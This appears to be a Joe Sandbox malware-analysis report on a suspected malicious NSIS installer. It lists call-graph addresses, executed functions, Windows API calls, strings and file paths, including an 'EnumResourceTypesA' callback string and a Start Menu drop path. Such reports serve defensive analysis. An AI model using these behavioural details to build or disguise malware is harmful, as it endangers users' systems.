403cc4 4413->4415 4414->4412 4415->4303 4421 403cc0 4416->4421 4419 403bf1 4417->4419 4420 403bcb lstrcmpiW 4417->4420 4422 403bba 4418->4422 4424 405cc3 3 API calls 4419->4424 4420->4419 4423 403bdb GetFileAttributesW 4420->4423 4421->4415 4426 403d93 18 API calls 4421->4426 4422->4417 4425 403be7 4423->4425 4427 403bf7 4424->4427 4425->4419 4428 405d0f 2 API calls 4425->4428 4429 403cd1 4426->4429 4532 4063ee lstrcpynW 4427->4532 4428->4419 4431 403d60 4429->4431 4432 403cdd ShowWindow 4429->4432 4525 405529 OleInitialize 4431->4525 4434 406773 3 API calls 4432->4434 4436 403cf5 4434->4436 4435 403d66 4437 403d82 4435->4437 4438 403d6a 4435->4438 4439 403d03 GetClassInfoW 4436->4439 4443 406773 3 API calls 4436->4443 4442 40140b 2 API calls 4437->4442 4438->4415 4445 40140b 2 API calls 4438->4445 4440 403d17 GetClassInfoW RegisterClassW 4439->4440 4441 403d2d DialogBoxParamW 4439->4441 4440->4441 4444 40140b 2 API calls 4441->4444 4442->4415 4443->4439 4444->4415 4445->4415 4446->4295 4447->4327 4448->4334 4450 4039fb 4449->4450 4451 4039ed CloseHandle 4449->4451 4544 403a28 4450->4544 4451->4450 4454 405b00 67 API calls 4455 403816 OleUninitialize 4454->4455 4455->4301 4455->4302 4457 405a69 4456->4457 4458 403835 ExitProcess 4457->4458 4459 405a7d MessageBoxIndirectW 4457->4459 4459->4458 4460->4336 4461->4347 4463 405a16 4462->4463 4464 405a0a CloseHandle 4462->4464 4463->4347 4464->4463 4466 401389 2 API calls 4465->4466 4467 401420 4466->4467 4467->4305 4469 405f20 GetTickCount GetTempFileNameW 4468->4469 4470 4034a0 4469->4470 4471 405f56 4469->4471 4470->4282 4471->4469 4471->4470 4472->4364 4473->4366 4474->4370 4476 402fd2 4475->4476 4477 402fba 4475->4477 4478 402fe2 GetTickCount 4476->4478 4479 402fda 4476->4479 4480 402fc3 DestroyWindow 4477->4480 4481 402fca 4477->4481 4483 402ff0 CreateDialogParamW ShowWindow 4478->4483 4484 403013 4478->4484 4511 40681f 4479->4511 4480->4481 4481->4373 4483->4484 4484->4373 4486->4380 4489 403265 4487->4489 4488 403293 4491 403444 ReadFile 4488->4491 4489->4488 4515 40345a SetFilePointer 4489->4515 4492 40329e 4491->4492 4493 4032b0 GetTickCount 4492->4493 4494 4033dd 4492->4494 4499 4033c7 4492->4499 4493->4499 4506 4032dc 4493->4506 4495 4033e1 4494->4495 4496 40341f 4494->4496 4495->4499 4500 403444 ReadFile 4495->4500 4501 405f96 WriteFile 4495->4501 4497 403444 ReadFile 4496->4497 4497->4499 4498 403444 ReadFile 4498->4506 4499->4388 4500->4495 4501->4495 4502 403332 GetTickCount 4502->4506 4503 403357 MulDiv wsprintfW 4504 405456 24 API calls 4503->4504 4504->4506 4505 405f96 WriteFile 4505->4506 4506->4498 4506->4499 4506->4502 4506->4503 4506->4505 4508 405f67 ReadFile 4507->4508 4509 403457 4508->4509 4509->4383 4510->4379 4512 40683c PeekMessageW 4511->4512 4513 406832 DispatchMessageW 4512->4513 4514 402fe0 4512->4514 4513->4512 4514->4373 4515->4488 4516->4398 4518 403da7 4517->4518 4533 406335 wsprintfW 4518->4533 4520 403e18 4534 403e4c 4520->4534 4522 403b48 4522->4403 4523 403e1d 4523->4522 4524 40642b 17 API calls 4523->4524 4524->4523 4537 404390 4525->4537 4527 405573 4528 404390 SendMessageW 4527->4528 4530 405585 OleUninitialize 4528->4530 4529 40554c 4529->4527 4540 401389 4529->4540 4530->4435 4532->4405 4533->4520 4535 40642b 17 API calls 4534->4535 4536 403e5a SetWindowTextW 4535->4536 4536->4523 4538 4043a8 4537->4538 4539 404399 SendMessageW 4537->4539 4538->4529 4539->4538 4542 401390 4540->4542 4541 4013fe 4541->4529 4542->4541 4543 4013cb MulDiv SendMessageW 4542->4543 4543->4542 4545 403a36 4544->4545 4546 403a3b FreeLibrary GlobalFree 4545->4546 4547 403a00 4545->4547 4546->4546 4546->4547 4547->4454 4548 402522 4559 402d7e 4548->4559 4551 402d3e 17 API calls 4552 402535 4551->4552 4553 402540 RegQueryValueExW 4552->4553 4556 402925 4552->4556 4554 402560 4553->4554 4555 402566 RegCloseKey 4553->4555 4554->4555 4564 406335 wsprintfW 4554->4564 4555->4556 4560 402d3e 17 API calls 4559->4560 4561 402d95 4560->4561 4562 40625b RegOpenKeyExW 4561->4562 4563 40252c 4562->4563 4563->4551 4564->4555 5572 6fdf103d 5573 6fdf101b 5 API calls 5572->5573 5574 6fdf1056 5573->5574 5575 4021a2 5576 402d3e 17 API calls 5575->5576 5577 4021a9 5576->5577 5578 402d3e 17 API calls 5577->5578 5579 4021b3 5578->5579 5580 402d3e 17 API calls 5579->5580 5581 4021bd 5580->5581 5582 402d3e 17 API calls 5581->5582 5583 4021c7 5582->5583 5584 402d3e 17 API calls 5583->5584 5586 4021d1 5584->5586 5585 402210 CoCreateInstance 5590 40222f 5585->5590 5586->5585 5587 402d3e 17 API calls 5586->5587 5587->5585 5588 401423 24 API calls 5589 4022ee 5588->5589 5590->5588 5590->5589 5591 4015a3 5592 402d3e 17 API calls 5591->5592 5593 4015aa SetFileAttributesW 5592->5593 5594 4015bc 5593->5594 5595 401fa4 5596 402d3e 17 API calls 5595->5596 5597 401faa 5596->5597 5598 405456 24 API calls 5597->5598 5599 401fb4 5598->5599 5600 4059d7 2 API calls 5599->5600 5601 401fba 5600->5601 5602 401fdd CloseHandle 5601->5602 5603 40688e 5 API calls 5601->5603 5605 402925 5601->5605 5602->5605 5606 401fcf 5603->5606 5606->5602 5608 406335 wsprintfW 5606->5608 5608->5602 5609 40202a 5610 402d3e 17 API calls 5609->5610 5611 402031 5610->5611 5612 4067e3 5 API calls 5611->5612 5613 402040 5612->5613 5614 4020c4 5613->5614 5615 40205c GlobalAlloc 5613->5615 5615->5614 5616 402070 5615->5616 5617 4067e3 5 API calls 5616->5617 5618 402077 5617->5618 5619 4067e3 5 API calls 5618->5619 5620 402081 5619->5620 5620->5614 5624 406335 wsprintfW 5620->5624 5622 4020b6 5625 406335 wsprintfW 5622->5625 5624->5622 5625->5614 5626 4023aa 5627 4023b2 5626->5627 5628 4023b8 5626->5628 5629 402d3e 17 API calls 5627->5629 5630 4023c6 5628->5630 5631 402d3e 17 API calls 5628->5631 5629->5628 5632 402d3e 17 API calls 5630->5632 5634 4023d4 5630->5634 5631->5630 5632->5634 5633 402d3e 17 API calls 5635 4023dd WritePrivateProfileStringW 5633->5635 5634->5633 5636 402f2b 5637 402f3d SetTimer 5636->5637 5640 402f56 5636->5640 5637->5640 5638 402fab 5639 402f70 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5639->5638 5640->5638 5640->5639 4659 40242c 4660 402434 4659->4660 4661 40245f 4659->4661 4662 402d7e 17 API calls 4660->4662 4663 402d3e 17 API calls 4661->4663 4664 40243b 4662->4664 4665 402466 4663->4665 4667 402445 4664->4667 4670 402473 4664->4670 4671 402dfc 4665->4671 4668 402d3e 17 API calls 4667->4668 4669 40244c RegDeleteValueW RegCloseKey 4668->4669 4669->4670 4672 402e09 4671->4672 4673 402e10 4671->4673 4672->4670 4673->4672 4675 402e41 4673->4675 4676 40625b RegOpenKeyExW 4675->4676 4677 402e6f 4676->4677 4678 402f24 4677->4678 4679 402e79 4677->4679 4678->4672 4680 402ea2 4679->4680 4681 402e7f RegEnumValueW 4679->4681 4682 402f09 RegCloseKey 4680->4682 4683 402ede RegEnumKeyW 4680->4683 4684 402ee7 RegCloseKey 4680->4684 4687 402e41 6 API calls 4680->4687 4681->4680 4681->4682 4682->4678 4683->4680 4683->4684 4685 4067e3 5 API calls 4684->4685 4686 402ef7 4685->4686 4688 402f19 4686->4688 4689 402efb RegDeleteKeyW 4686->4689 4687->4680 4688->4678 4689->4678 5641 401a30 5642 402d3e 17 API calls 5641->5642 5643 401a39 ExpandEnvironmentStringsW 5642->5643 5644 401a4d 5643->5644 5646 401a60 5643->5646 5645 401a52 lstrcmpW 5644->5645 5644->5646 5645->5646 5647 404db1 GetDlgItem GetDlgItem 5648 404e05 7 API calls 5647->5648 5657 40502f 5647->5657 5649 404ea2 SendMessageW 5648->5649 5650 404eaf DeleteObject 5648->5650 5649->5650 5651 404eba 5650->5651 5652 404ef1 5651->5652 5656 40642b 17 API calls 5651->5656 5654 404344 18 API calls 5652->5654 5653 405117 5655 4051c0 5653->5655 5666 40516d SendMessageW 5653->5666 5690 405022 5653->5690 5658 404f05 5654->5658 5660 4051d5 5655->5660 5661 4051c9 SendMessageW 5655->5661 5662 404ed3 SendMessageW SendMessageW 5656->5662 5657->5653 5659 4050a1 5657->5659 5664 404cff 5 API calls 5657->5664 5665 404344 18 API calls 5658->5665 5659->5653 5667 405109 SendMessageW 5659->5667 5669 4051e7 ImageList_Destroy 5660->5669 5670 4051ee 5660->5670 5677 4051fe 5660->5677 5661->5660 5662->5651 5663 4043ab 8 API calls 5668 4053c3 5663->5668 5664->5659 5681 404f16 5665->5681 5672 405182 SendMessageW 5666->5672 5666->5690 5667->5653 5669->5670 5673 4051f7 GlobalFree 5670->5673 5670->5677 5671 405377 5678 405389 ShowWindow GetDlgItem ShowWindow 5671->5678 5671->5690 5675 405195 5672->5675 5673->5677 5674 404ff1 GetWindowLongW SetWindowLongW 5676 40500a 5674->5676 5685 4051a6 SendMessageW 5675->5685 5679 405027 5676->5679 5680 40500f ShowWindow 5676->5680 5677->5671 5689 404d7f 4 API calls 5677->5689 5694 405239 5677->5694 5678->5690 5700 404379 SendMessageW 5679->5700 5699 404379 SendMessageW 5680->5699 5681->5674 5684 404f69 SendMessageW 5681->5684 5686 404fec 5681->5686 5687 404fa7 SendMessageW 5681->5687 5688 404fbb SendMessageW 5681->5688 5684->5681 5685->5655 5686->5674 5686->5676 5687->5681 5688->5681 5689->5694 5690->5663 5691 405343 5692 40534d InvalidateRect 5691->5692 5696 405359 5691->5696 5692->5696 5693 405267 SendMessageW 5695 40527d 5693->5695 5694->5693 5694->5695 5695->5691 5697 4052f1 SendMessageW SendMessageW 5695->5697 5696->5671 5701 404cba 5696->5701 5697->5695 5699->5690 5700->5657 5704 404bf1 5701->5704 5703 404ccf 5703->5671 5705 404c0a 5704->5705 5706 40642b 17 API calls 5705->5706 5707 404c6e 5706->5707 5708 40642b 17 API calls 5707->5708 5709 404c79 5708->5709 5710 40642b 17 API calls 5709->5710 5711 404c8f lstrlenW wsprintfW SetDlgItemTextW 5710->5711 5711->5703 5717 4044b4 lstrlenW 5718 4044d3 5717->5718 5719 4044d5 WideCharToMultiByte 5717->5719 5718->5719 5720 404835 5721 404861 5720->5721 5722 404872 5720->5722 5781 405a38 GetDlgItemTextW 5721->5781 5724 40487e GetDlgItem 5722->5724 5730 4048dd 5722->5730 5726 404892 5724->5726 5725 40486c 5728 40669d 5 API calls 5725->5728 5729 4048a6 SetWindowTextW 5726->5729 5733 405d6e 4 API calls 5726->5733 5727 4049c1 5779 404b70 5727->5779 5783 405a38 GetDlgItemTextW 5727->5783 5728->5722 5734 404344 18 API calls 5729->5734 5730->5727 5735 40642b 17 API calls 5730->5735 5730->5779 5732 4043ab 8 API calls 5737 404b84 5732->5737 5738 40489c 5733->5738 5739 4048c2 5734->5739 5740 404951 SHBrowseForFolderW 5735->5740 5736 4049f1 5741 405dcb 18 API calls 5736->5741 5738->5729 5747 405cc3 3 API calls 5738->5747 5742 404344 18 API calls 5739->5742 5740->5727 5743 404969 CoTaskMemFree 5740->5743 5744 4049f7 5741->5744 5745 4048d0 5742->5745 5746 405cc3 3 API calls 5743->5746 5784 4063ee lstrcpynW 5744->5784 5782 404379 SendMessageW 5745->5782 5749 404976 5746->5749 5747->5729 5752 4049ad SetDlgItemTextW 5749->5752 5756 40642b 17 API calls 5749->5756 5751 4048d6 5754 4067e3 5 API calls 5751->5754 5752->5727 5753 404a0e 5755 4067e3 5 API calls 5753->5755 5754->5730 5763 404a15 5755->5763 5757 404995 lstrcmpiW 5756->5757 5757->5752 5760 4049a6 lstrcatW 5757->5760 5758 404a56 5785 4063ee lstrcpynW 5758->5785 5760->5752 5761 404a5d 5762 405d6e 4 API calls 5761->5762 5764 404a63 GetDiskFreeSpaceW 5762->5764 5763->5758 5767 405d0f 2 API calls 5763->5767 5769 404aae 5763->5769 5766 404a87 MulDiv 5764->5766 5764->5769 5766->5769 5767->5763 5768 404b1f 5771 404b42 5768->5771 5773 40140b 2 API calls 5768->5773 5769->5768 5770 404cba 20 API calls 5769->5770 5772 404b0c 5770->5772 5786 404366 KiUserCallbackDispatcher 5771->5786 5774 404b21 SetDlgItemTextW 5772->5774 5775 404b11 5772->5775 5773->5771 5774->5768 5778 404bf1 20 API calls 5775->5778 5777 404b5e 5777->5779 5780 40478e SendMessageW 5777->5780 5778->5768 5779->5732 5780->5779 5781->5725 5782->5751 5783->5736 5784->5753 5785->5761 5786->5777 5787 401735 5788 402d3e 17 API calls 5787->5788 5789 40173c SearchPathW 5788->5789 5790 401757 5789->5790 5791 402636 5792 402665 5791->5792 5793 40264a 5791->5793 5795 402695 5792->5795 5796 40266a 5792->5796 5794 402d1c 17 API calls 5793->5794 5805 402651 5794->5805 5797 402d3e 17 API calls 5795->5797 5798 402d3e 17 API calls 5796->5798 5799 40269c lstrlenW 5797->5799 5800 402671 5798->5800 5799->5805 5808 406410 WideCharToMultiByte 5800->5808 5802 402685 lstrlenA 5802->5805 5803 4026df 5804 4026c9 5804->5803 5806 405f96 WriteFile 5804->5806 5805->5803 5805->5804 5807 405fc5 5 API calls 5805->5807 5806->5803 5807->5804 5808->5802 5809 4014b8 5810 4014be 5809->5810 5811 401389 2 API calls 5810->5811 5812 4014c6 5811->5812 5813 401d38 5814 402d1c 17 API calls 5813->5814 5815 401d3f 5814->5815 5816 402d1c 17 API calls 5815->5816 5817 401d4b GetDlgItem 5816->5817 5818 402630 5817->5818 5819 4028bb 5820 4028c1 5819->5820 5821 4028c9 FindClose 5820->5821 5822 402bc2 5820->5822 5821->5822 5823 6fdf2ca3 5824 6fdf2cbb 5823->5824 5825 6fdf158f 2 API calls 5824->5825 5826 6fdf2cd6 5825->5826

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 004034A2 Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 410stringfilecomCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 4034a2-4034df SetErrorMode GetVersion 1 4034e1-4034e9 call 4067e3 0->1 2 4034f2 0->2 1->2 8 4034eb 1->8 4 4034f7-40350b call 406773 lstrlenA 2->4 9 40350d-403529 call 4067e3 * 3 4->9 8->2 16 40353a-403599 #17 OleInitialize SHGetFileInfoW call 4063ee GetCommandLineW call 4063ee 9->16 17 40352b-403531 9->17 24 4035a3-4035bd call 405cf0 CharNextW 16->24 25 40359b-4035a2 16->25 17->16 22 403533 17->22 22->16 28 4035c3-4035c9 24->28 29 4036d4-4036ee GetTempPathW call 403471 24->29 25->24 31 4035d2-4035d6 28->31 32 4035cb-4035d0 28->32 36 4036f0-40370e GetWindowsDirectoryW lstrcatW call 403471 29->36 37 403746-403760 DeleteFileW call 403015 29->37 34 4035d8-4035dc 31->34 35 4035dd-4035e1 31->35 32->31 32->32 34->35 38 4036a0-4036ad call 405cf0 35->38 39 4035e7-4035ed 35->39 36->37 54 403710-403740 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403471 36->54 57 403811-403821 call 4039e3 OleUninitialize 37->57 58 403766-40376c 37->58 55 4036b1-4036b7 38->55 56 4036af-4036b0 38->56 43 403608-403641 39->43 44 4035ef-4035f7 39->44 45 403643-403648 43->45 46 40365e-403698 43->46 50 4035f9-4035fc 44->50 51 4035fe 44->51 45->46 52 40364a-403652 45->52 46->38 53 40369a-40369e 46->53 50->43 50->51 51->43 60 403654-403657 52->60 61 403659 52->61 53->38 62 4036bf-4036cd call 4063ee 53->62 54->37 54->57 55->28 64 4036bd 55->64 56->55 73 403947-40394d 57->73 74 403827-403837 call 405a54 ExitProcess 57->74 65 403801-403808 call 403abd 58->65 66 403772-40377d call 405cf0 58->66 60->46 60->61 61->46 69 4036d2 62->69 64->69 76 40380d 65->76 80 4037cb-4037d5 66->80 81 40377f-4037b4 66->81 69->29 78 4039cb-4039d3 73->78 79 40394f-403965 GetCurrentProcess OpenProcessToken 73->79 76->57 83 4039d5 78->83 84 4039d9-4039dd ExitProcess 78->84 88 403967-403995 LookupPrivilegeValueW AdjustTokenPrivileges 79->88 89 40399b-4039a9 call 4067e3 79->89 86 4037d7-4037e5 call 405dcb 80->86 87 40383d-403851 call 4059bf lstrcatW 80->87 82 4037b6-4037ba 81->82 90 4037c3-4037c7 82->90 91 4037bc-4037c1 82->91 83->84 86->57 99 4037e7-4037fd call 4063ee * 2 86->99 100 403853-403859 lstrcatW 87->100 101 40385e-403878 lstrcatW lstrcmpiW 87->101 88->89 102 4039b7-4039c2 ExitWindowsEx 89->102 103 4039ab-4039b5 89->103 90->82 95 4037c9 90->95 91->90 91->95 95->80 99->65 100->101 101->57 106 40387a-40387d 101->106 102->78 104 4039c4-4039c6 call 40140b 102->104 103->102 103->104 104->78 109 403886 call 4059a2 106->109 110 40387f-403884 call 405925 106->110 115 40388b-403899 SetCurrentDirectoryW 109->115 110->115 118 4038a6-4038cf call 4063ee 115->118 119 40389b-4038a1 call 4063ee 115->119 123 4038d4-4038f0 call 40642b DeleteFileW 118->123 119->118 126 403931-403939 123->126 127 4038f2-403902 CopyFileW 123->127 126->123 128 40393b-403942 call 4061b4 126->128 127->126 129 403904-403924 call 4061b4 call 40642b call 4059d7 127->129 128->57 129->126 138 403926-40392d CloseHandle 129->138 138->126
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetErrorMode.KERNELBASE ref: 004034C5
                                                                                                                                                                                • GetVersion.KERNEL32 ref: 004034CB
                                                                                                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034FE
                                                                                                                                                                                • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040353B
                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00403542
                                                                                                                                                                                • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 0040355E
                                                                                                                                                                                • GetCommandLineW.KERNEL32(007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 00403573
                                                                                                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\02Eh1ah35H.exe",00000020,"C:\Users\user\Desktop\02Eh1ah35H.exe",00000000,?,00000007,00000009,0000000B), ref: 004035AB
                                                                                                                                                                                  • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                                                                                                                                                                  • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                                                                                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E5
                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036F6
                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403702
                                                                                                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403716
                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040371E
                                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040372F
                                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403737
                                                                                                                                                                                • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 0040374B
                                                                                                                                                                                  • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                                                                                                                                                                • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403816
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403837
                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\02Eh1ah35H.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040384A
                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\02Eh1ah35H.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403859
                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\02Eh1ah35H.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403864
                                                                                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\02Eh1ah35H.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403870
                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040388C
                                                                                                                                                                                • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,00000009,?,00000007,00000009,0000000B), ref: 004038E6
                                                                                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\02Eh1ah35H.exe,0079F708,00000001,?,00000007,00000009,0000000B), ref: 004038FA
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000,?,00000007,00000009,0000000B), ref: 00403927
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403956
                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040395D
                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403972
                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403995
                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BA
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 004039DD
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\02Eh1ah35H.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$C:\Users\user\Desktop$C:\Users\user\Desktop\02Eh1ah35H.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$kernel32::EnumResourceTypesA(i 0,i r8,i 0)$~nsu
                                                                                                                                                                                • API String ID: 3441113951-742160962
                                                                                                                                                                                • Opcode ID: ef7bc40cfc21a65b5c7abadd4c778368bce5dd0c15bdea56e8fa6b9d03db3f5a
                                                                                                                                                                                • Instruction ID: d7b9bf8e5ec5db16f392776339999e6c5d6af7d7718e861a4dfbc7241a8cc938
                                                                                                                                                                                • Opcode Fuzzy Hash: ef7bc40cfc21a65b5c7abadd4c778368bce5dd0c15bdea56e8fa6b9d03db3f5a
                                                                                                                                                                                • Instruction Fuzzy Hash: 65D1F6B1200310AAD7207F659D49B2B3AACEB81749F10843FF581B62D1DB7D8A55C76E
                                                                                                                                                                                Function 00405595 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 139 405595-4055b0 140 4055b6-40567d GetDlgItem * 3 call 404379 call 404cd2 GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 40573f-405746 139->141 163 40569b-40569e 140->163 164 40567f-405699 SendMessageW * 2 140->164 143 405770-40577d 141->143 144 405748-40576a GetDlgItem CreateThread CloseHandle 141->144 146 40579b-4057a5 143->146 147 40577f-405785 143->147 144->143 148 4057a7-4057ad 146->148 149 4057fb-4057ff 146->149 151 4057c0-4057c9 call 4043ab 147->151 152 405787-405796 ShowWindow * 2 call 404379 147->152 153 4057d5-4057e5 ShowWindow 148->153 154 4057af-4057bb call 40431d 148->154 149->151 157 405801-405807 149->157 160 4057ce-4057d2 151->160 152->146 161 4057f5-4057f6 call 40431d 153->161 162 4057e7-4057f0 call 405456 153->162 154->151 157->151 165 405809-40581c SendMessageW 157->165 161->149 162->161 168 4056a0-4056ac SendMessageW 163->168 169 4056ae-4056c5 call 404344 163->169 164->163 170 405822-40584d CreatePopupMenu call 40642b AppendMenuW 165->170 171 40591e-405920 165->171 168->169 178 4056c7-4056db ShowWindow 169->178 179 4056fb-40571c GetDlgItem SendMessageW 169->179 176 405862-405877 TrackPopupMenu 170->176 177 40584f-40585f GetWindowRect 170->177 171->160 176->171 180 40587d-405894 176->180 177->176 181 4056ea 178->181 182 4056dd-4056e8 ShowWindow 178->182 179->171 183 405722-40573a SendMessageW * 2 179->183 184 405899-4058b4 SendMessageW 180->184 185 4056f0-4056f6 call 404379 181->185 182->185 183->171 184->184 186 4058b6-4058d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 4058db-405902 SendMessageW 186->188 188->188 189 405904-405918 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->171
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 004055F3
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405602
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040563F
                                                                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 00405646
                                                                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405667
                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405678
                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040568B
                                                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405699
                                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056AC
                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056CE
                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004056E2
